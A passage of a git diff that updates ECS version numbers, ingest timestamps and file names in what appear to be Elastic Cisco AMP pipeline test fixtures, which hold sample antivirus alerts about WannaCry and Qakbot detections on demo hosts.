"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7845,7 +7845,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7877,7 +7877,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843806383Z", + "ingested": "2021-09-13T18:07:04.510512116Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7939,7 +7939,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7969,7 +7969,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843808566Z", + "ingested": "2021-09-13T18:07:04.510513970Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -8028,7 +8028,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -8058,7 +8058,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843810485Z", + "ingested": "2021-09-13T18:07:04.510515850Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Detected", diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json similarity index 98% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json index 485829d5bda..e0b337505a5 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json @@ -19,7 +19,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -51,7 +51,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500123245Z", + "ingested": "2021-09-13T18:07:28.111129724Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -108,7 +108,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -128,7 +128,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500128111Z", + "ingested": "2021-09-13T18:07:28.111134931Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -183,7 +183,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -203,7 +203,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500130418Z", + "ingested": "2021-09-13T18:07:28.111137209Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -260,7 +260,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -290,7 +290,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500132533Z", + "ingested": "2021-09-13T18:07:28.111139358Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -356,7 +356,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -388,7 +388,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500134723Z", + "ingested": "2021-09-13T18:07:28.111141503Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -458,7 +458,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -490,7 +490,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500136852Z", + "ingested": "2021-09-13T18:07:28.111143609Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -547,7 +547,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -567,7 +567,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500138978Z", + "ingested": "2021-09-13T18:07:28.111145703Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -618,7 +618,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -638,7 +638,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500141093Z", + "ingested": "2021-09-13T18:07:28.111147798Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -697,7 +697,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -729,7 +729,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500143175Z", + "ingested": "2021-09-13T18:07:28.111149933Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -786,7 +786,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -818,7 +818,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500145233Z", + "ingested": "2021-09-13T18:07:28.111152028Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -871,7 +871,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -891,7 +891,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500147317Z", + "ingested": "2021-09-13T18:07:28.111154118Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat 